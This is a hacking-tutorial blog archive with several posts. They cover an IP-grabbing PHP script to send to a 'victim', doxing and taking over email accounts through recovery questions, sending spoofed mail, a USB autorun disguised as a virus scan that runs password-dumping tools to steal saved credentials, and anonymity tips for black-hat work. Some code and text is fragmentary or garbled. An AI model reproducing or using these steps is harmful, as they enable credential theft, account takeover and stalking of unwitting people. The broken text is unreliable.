News Trending
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

How To Grab Someone's IP Address ?


In this tutorial I will you show you how to grab someone’s IP address using PHP script. This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

$number0 = " This is Your IP/Proxy";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";


header("Content-type: image/png");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);

    2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .

    3. Now Upload Grab.php to your web hosting site.

    4. Copy the link of your  uploaded file and send it to victim.

    5. As soon as victim will click on your link his ip will be saved in your free web hosting site.

    6. Enjoy you are Done !!
Read More

What Is Doxing? Doxing and its Uses............

No comments:

You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl ( Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook ( Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it intoFacebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside of this, in order to find your email, the hacker either has to guess your email, befriend you on Facebook or hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.Now, you’re probably thinking, “How’s he going to hack me with just my email?” well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he going to guess my recovery question answers?”well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.
Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.” 
Any hacker reading this, that didn't previously know about reverting, would probably look at this and say This would never work!” but you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use. 

How can you insure that you won’t be Doxed?

Well, as the Internet becomes more and more useful and addicting, it will become harder to not get Doxed. The main issue for most victims is their security questions, and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).So, the main rule to not getting hacked is: Have Strong Passwords and almost impossible to guess recovery questions.

Read More

How to Check The email is original or Not

No comments:

First of all let us see How email system is working over internet.
The email is sent on internet as shown in below picture

So Here The Sender i.e is sending a mail to so the sender will type the mail and click on
send button and the mail will go to will forward the mail over internet and the internet
will search the email ids server and send it to and the the will search for
the in their own database and then the mail will be forwarded to and when the XYZ user
login to their account they will see an email in their inbox which is from

Now How To send the fake mail

To send fake mail We need to Bypass the and both and directly send an email over
internet .
So for that we will use a .php script as php has a function mail(); which can send email to any one without the and directly delivering the mail to and then will search for the in
their own database and then the mail will be forwarded to and when the XYZ user login to their account
they will see an email in their inbox which is from

But actually the email is not sent byabc@server1.comto so it is a fake mail.

Now How to check When you receive such mail.

Step 1:- First of all open the mail.

Step 2:- Now Click on the downward arrow near reply button. and click on show original.

Now check for The received from field on the page opened.
and see who has sent you the email , here is the sender.
so in the received from field check that there must be microsoft.comand not any other thing.
this was fake mail as there was and so the mail is fake as there is no here.

If you know how to do it ,Then you must know how to prevent it...
Read More

What is A PHISHING attack ? And how to avoid it.....

No comments:


   The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to
scam the user into surrendering private information that will be used for identity theft.

   The Email directs the user to visit a Web site where they are asked to update personal information, such as
passwords and credit card, social security, and bank account numbers, that the legitimate organization already
has. The Web site, however, is Bogus and set up only to steal the User’s information.

Phishing scams could be

  Emails inviting you to join a Social Group, asking you to Login using your Username and Password.

  Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.

  Emails containing some Information of your Interest and asking you to Login to Your Account.

  Any Email carrying a Link to Click and asking you to Login.

Prevention against Phishing

  Read all the Email Carefully and Check if the Sender is Original

  Watch the Link Carefully before Clicking

  Always check the URL in the Browser before Signing IN to your Account

  Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email.
Read More

How to Trace Any IP Address


How to Trace the IP Address Back to the Source?

In fact, tracing an IP address back to its location is a lot simpler than what many people imagine. There exists many online tools using which you can accomplish this job. One of my favorite site is
Just go to and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address:

  • Country in which the IP is located
  • City to which the IP address belongs to
  • Latitude/Longitude of the IP’s location
  • Zip Code of the region to which the IP belongs to
  • Time Zone associated with the IP
  • Name of the ISP to which the IP address belong to
  • Internet Speed of the computer associated with the IP
  • Weather Station associated with the region of the IP
  • Domain name associated with the IP address
A sample snapshot of the results from is given below:

You can also visually trace route any IP address back to its location. For this, just visit and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination.
Read More


No comments:
Guyz in this Tutorial i will tell you how to Steal/Hack someone’s computer passwords through USB Flash Drive…

 As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords.

Step 1: Create New/open notepad/wordpad…Type or copy/paste Red Text below:-
[autorun]open=launch.batACTION= Perform a Virus Scan
Save this as AUTORUN.inf

Step 2: Open a new notepad/wordpad document…Type or copy/paste Red Text below…

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
Save this as LAUNCH.batNow you have 2 files… 

Step 3: Copy the autorun and launch file to your USB…

Step 4: Go to download the programs which you named in Step 2… 

Step 5: Extract the files you downloaded to your desktop and copy all the .exe files to your USB…

Step 6: Remove and re-insert your USB…

Step 7: Click on the option “perform a virus scan”…(this is an exemple, if you want it to say something else go to the autorun file and change it)…

Step 8: Now go to my computer and see usb drive, you will now see some text files, if you open them you will see usernames and passwords...........!!!!!!!!!!!!!

Hope this article helps you.
Read More

Staying Anonymous

No comments:
If you are planning to be Black/ Grey/ Green Hat hacker, then you will be really worried about you anonymity. What concerns you most have to be "How to stay Anonymous?" . So here are some methods to stay anonymous. These are only some basic anonymity techniques and the more advanced techniques will be lectured in the following tutorials.


VPN is the acronym of Virtual Private Network. As from a hacker's point of view, here are the facts that justifies its need:

1) Counterfeit the ISP's packet detection measures.    Maintain your anonymity and boost by keeping your ISP from throttling, inspecting and prioritizing the data sent to and from your system.
2) Keep your IP address anonymous.    Prevent the places your packets are traversing from identifying your connection information and location.
3) Hide your online activities from third parties.    As a VPN provides a secure tunnel to make a connection to the outside world, it will keep the third parties away from finding your online activities.
4) And of-course, prevent location identification and Geo targeting.    Yeah! the title says it all.

To help you start, below are some of the FREE VPN's that are available.



Proxies are another less secure alternative for VPN's . Proxies does the same job as VPN's as it hides your IP when you are surfing through the internet. There are different types of proxies ranging from less anonymous to high anonymous proxies. One thing that you have to keep in mind is that the proxies will not last for ever. The available proxy address will change from time to time (which is a best thing for staying anonymous).

Below are some of the Proxy sites that you can use as a starting leveler.

Below are some of the Popular VM's that you can use .VMLite - - Box -

Note:- As I said in the starting of this tutorial, these are only some basic level Anonymity tools whose service you can make use of to stay anonymous. These cannot assure 100% anonymity and if you did something Black Hat stuffs and when you hear a door knock and see some cops outside your door, don't blame me :)

Read More

How To Reveal Hidden Passwords (Asterisks) In Web Browsers

No comments:
In many places where you need to input your password to gain access, authorize or confirm a transaction, whenever you type passwords into the input text box, the characters automatically turns into asterisks or bullets. This is to protect your password from straying eyes.
However, in situations that require you to know what lies behind those asterisks, we’ve got a simple trick to reveal the passwords on your web browsers.
These hidden passwords are disguised with the help of simple HTML and CSS. So just changing the value of something specific will easily reveal what’s behind those bullets or astericks. We’ll show you how this is done in Google Chrome and Firefox.

Google Chrome

In any website which contains your saved password, right click on the password box and click on Inspect element.

Chrome Inspect Element

You’ll now notice the bottom quarter of your screen filled with codes. You only need to focus on the highlighted (in blue) part to reveal the password.

                  Chrome Code

Look for type="password" and double click on it. Replace the word ‘password’ with ‘text‘.
It should now look like type="text". Hit Enter.
                  Chrome Change Codes
After you’ve changed that, the text behind the asterisks or bullets will be revealed.
Reveal Password

Mozilla Firefox

To reveal the password in Firefox, first, right click the password box and select Inspect Element.

Firefox Inspect Element

A dark grey bar will appear at the bottom of the browser; click on the Markup Panel or hit Alt +M.

                   Firefox Code

It will reveal a few lines of codes; the line you want to focus at is the highlighted line.

                   Firefox Code

Again, look for type="password" and double click on it. Replace the word ‘password’ with ‘text‘ so it looks like type="text". Then hit Enter.

                  Firefox Change Code

The password masked behind the asterisks or bullets will now be revealed.

                 Reveal Password

Thats it.........
Read More